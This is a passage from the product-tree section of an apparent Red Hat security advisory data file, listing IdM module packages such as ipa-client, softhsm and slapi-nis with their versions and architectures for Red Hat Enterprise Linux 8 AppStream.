"name": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch"
},
"product_reference": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch"
},
"product_reference": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch"
},
"product_reference": "python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch"
},
"product_reference": "python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch"
},
"product_reference": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch"
},
"product_reference": "python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch"
},
"product_reference": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch"
},
"product_reference": "python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch"
},
"product_reference": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch"
},
"product_reference": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src"
},
"product_reference": "pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64"
},
"product_reference": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le"
},
"product_reference": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x"
},
"product_reference": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src"
},
"product_reference": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64"
},
"product_reference": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64"
},
"product_reference": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le"
},
"product_reference": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x"
},
"product_reference": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64"
},
"product_reference": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64"
},
"product_reference": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le"
},
"product_reference": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x"
},
"product_reference": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64"
},
"product_reference": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64"
},
"product_reference": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le"
},
"product_reference": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x"
},
"product_reference": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src"
},
"product_reference": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64"
},
"product_reference": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64"
},
"product_reference": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le"
},
"product_reference": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x"
},
"product_reference": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64"
},
"product_reference": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64"
},
"product_reference": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le"
},
"product_reference": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x"
},
"product_reference": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64"
},
"product_reference": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64"
},
"product_reference": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le"
},
"product_reference": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x"
},
"product_reference": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64"
},
"product_reference": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
"product_reference": "idm:client:8100020240417004735:143e9e98",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src"
},
"product_reference": "ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64"
},
"product_reference": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le"
},
"product_reference": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x"
},
"product_reference": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64"
},
"product_reference": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch"
